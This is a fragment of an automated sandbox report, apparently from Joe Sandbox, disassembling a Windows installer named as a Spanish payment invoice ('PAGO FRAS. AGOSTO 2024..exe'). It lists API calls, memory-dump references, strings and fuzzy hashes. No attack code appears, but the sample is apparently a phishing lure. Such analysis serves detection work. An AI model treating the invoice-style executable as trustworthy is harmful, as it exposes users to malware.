                                                                              • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                              APIs
                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                              • GetSysColor.USER32(?), ref: 0040412B
                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                              • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                              • SendMessageA.USER32(00000000), ref: 004041D5
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                              • SetCursor.USER32(00000000), ref: 00404258
                                                                              • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                              • SetCursor.USER32(00000000), ref: 0040427B
                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                              • String ID: (@@$N$Space required: $open
                                                                              • API String ID: 3615053054-3333049044
                                                                              • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                              • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                              • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                              • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextA.USER32(00000000,Blaggard Setup,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: Blaggard Setup$F
                                                                              • API String ID: 941294808-3342400391
                                                                              • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                              • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                              • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                              • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                              APIs
                                                                              • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                              • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                              • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                              • wsprintfA.USER32 ref: 00405AEF
                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                              • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
                                                                                • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                              • String ID: %s=%s$NUL$[Rename]
                                                                              • API String ID: 222337774-4148678300
                                                                              • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                              • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                              • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                              • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                              APIs
                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                              • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                              Strings
                                                                              • *?|<>/":, xrefs: 00405FE2
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                              • "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 00405FD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-3131691481
                                                                              • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                              • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                              • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                              • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                              • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                              • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                              • GetSysColor.USER32(?), ref: 00403FDF
                                                                              • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                              • DeleteObject.GDI32(?), ref: 00404009
                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                              • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                              • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                              • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                              • lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                              • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                              • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2531174081-0
                                                                              • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                              • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                              • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                              • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                              • GetMessagePos.USER32 ref: 00404836
                                                                              • ScreenToClient.USER32(?,?), ref: 00404850
                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                              • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                              • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                              • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                              • MulDiv.KERNEL32(000DAB95,00000064,000DAB99), ref: 00402BC5
                                                                              • wsprintfA.USER32 ref: 00402BD5
                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402BCF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                              • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                              • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                              • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                              • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                              • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                              • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                              • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$DeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 1912718029-0
                                                                              • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                              • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                              • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                              • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?), ref: 00401CE2
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                              Memory Dump Source
